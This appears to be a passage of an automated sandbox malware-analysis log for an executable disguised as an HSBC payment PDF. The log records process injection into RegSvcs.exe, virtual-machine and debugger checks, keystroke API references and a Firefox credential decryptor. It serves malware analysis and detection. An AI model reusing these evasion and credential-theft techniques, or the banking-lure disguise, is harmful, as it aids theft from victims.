Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598565
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597307
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596704
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596093
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595923
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593683
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593524
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593354
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 592959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 592718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 592387
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
Source: Spectrum.exe, 00000014.00000003.1493327773.00000000005E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00<
Source: SensorDataService.exe, 00000012.00000003.1563717043.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk SCSI Disk Device2jZ
Source: Spectrum.exe, 00000014.00000003.1495882169.00000000005BB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Devicer
Source: Spectrum.exe, 00000014.00000003.1495285221.00000000005D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 00000014.00000003.1495410432.00000000005E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @;^2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: Spectrum.exe, 00000014.00000003.1493327773.00000000005E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Spectrum.exe, 00000014.00000003.1493550327.00000000005D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverLMEM
Source: SensorDataService.exe, 00000012.00000003.1461972151.000000000059A000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000012.00000003.1462082089.000000000059A000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000012.00000003.1461666228.000000000058B000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1495882169.0000000000587000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346822252.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1992416564.000000000087B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1354235632.0000000000874000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1408234894.000000000087B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1382519180.0000000000873000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1538390741.000000000087B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1432188181.000000000087B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1354422021.000000000087C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1501311933.000000000087B000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000004.00000003.1382647933.000000000087C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: SensorDataService.exe, 00000012.00000003.1563717043.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Devicen
Source: SensorDataService.exe, 00000012.00000003.1461666228.000000000058B000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1493327773.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1495285221.00000000005D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
Source: snmptrap.exe, 00000013.00000002.2593089162.00000000004A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: Spectrum.exe, 00000014.00000003.1493327773.00000000005E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .inVMware Virtual disk SCSI Disk Devicet System ManagementR
Source: Spectrum.exe, 00000014.00000003.1495882169.00000000005BB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Device
Source: Spectrum.exe, 00000014.00000003.1495285221.00000000005E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000002.1346748360.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
Source: SensorDataService.exe, 00000012.00000003.1563717043.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: `hZSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: RegSvcs.exe, 00000005.00000002.2621954804.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, ssh-agent.exe, 00000016.00000002.2600146286.00000000005F1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Spectrum.exe, 00000014.00000003.1495285221.00000000005D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: SensorDataService.exe, 00000012.00000003.1461666228.000000000058B000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1493327773.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1495285221.00000000005D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
Source: SensorDataService.exe, 00000012.00000003.1563717043.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: `QZSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: SensorDataService.exe, 00000012.00000002.1564642086.00000000005A7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ZVMware Virtual USB MouseC:\Windows\System32\DDORes.dll,-2212
Source: Spectrum.exe, 00000014.00000003.1495410432.00000000005E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @;^VMware Virtual USB Mouse
Source: Spectrum.exe, 00000014.00000003.1495285221.00000000005D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
Source: Spectrum.exe, 00000014.00000003.1495285221.00000000005D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 4NECVMWar VMware SATA CD00
Source: SensorDataService.exe, 00000012.00000003.1462152441.0000000000588000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Z2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: Spectrum.exe, 00000014.00000003.1495683594.00000000005EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: B_SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 00000014.00000003.1495683594.00000000005EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
Source: Spectrum.exe, 00000014.00000003.1495683594.00000000005EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00
Source: Spectrum.exe, 00000014.00000003.1495285221.00000000005E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Spectrum.exe, 00000014.00000003.1493327773.00000000005E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
Source: SensorDataService.exe, 00000012.00000003.1461972151.000000000059A000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000012.00000003.1462082089.000000000059A000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 00000012.00000003.1461666228.000000000058B000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1495410432.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1495620937.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000002.2602829063.00000000005E6000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 00000014.00000003.1495285221.00000000005E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
              Source: Spectrum.exe, 00000014.00000003.1493327773.00000000005E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: Spectrum.exe, 00000014.00000003.1495285221.00000000005D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-180293
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-180644
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_05D64560 LdrInitializeThunk,LdrInitializeThunk,5_2_05D64560
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00473F09 BlockInput,0_2_00473F09
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435A7C
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00535FF8 mov eax, dword ptr fs:[00000030h]0_2_00535FF8
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00AC1158 mov eax, dword ptr fs:[00000030h]0_2_00AC1158
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00AC27D8 mov eax, dword ptr fs:[00000030h]0_2_00AC27D8
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00AC2778 mov eax, dword ptr fs:[00000030h]0_2_00AC2778
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F11130 mov eax, dword ptr fs:[00000030h]0_2_02F11130
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F534CD mov eax, dword ptr fs:[00000030h]0_2_02F534CD
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_00981130 mov eax, dword ptr fs:[00000030h]16_2_00981130
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_009C34CD mov eax, dword ptr fs:[00000030h]16_2_009C34CD
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004580A9
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A155
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0042A124 SetUnhandledExceptionFilter,0_2_0042A124
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F5420B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_02F5420B
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F508F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_02F508F1
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_009C08F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_009C08F1
              Source: C:\Windows\SysWOW64\perfhost.exeCode function: 16_2_009C420B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_009C420B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, UltraSpeed.cs | Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtOpenKeyEx: Indirect: 0x140077B9B
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtQueryValueKey: Indirect: 0x140077C9F
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtClose: Indirect: 0x140077E81
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 779008
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_004587B1 LogonUserW, 0_2_004587B1
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00403B3A
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004048D7
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00464C53 mouse_event, 0_2_00464C53
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00457CAF
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_0045874B
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Binary or memory string: Shell_TrayWnd
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_0042862B cpuid 0_2_0042862B
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST8584.tmp VolumeInformation
              Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST8595.tmp VolumeInformation
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\perfhost.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\Spectrum.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\TieringEngineService.exe | Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00434E87
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Code function: 0_2_00441E06 GetUserNameW, 0_2_00441E06
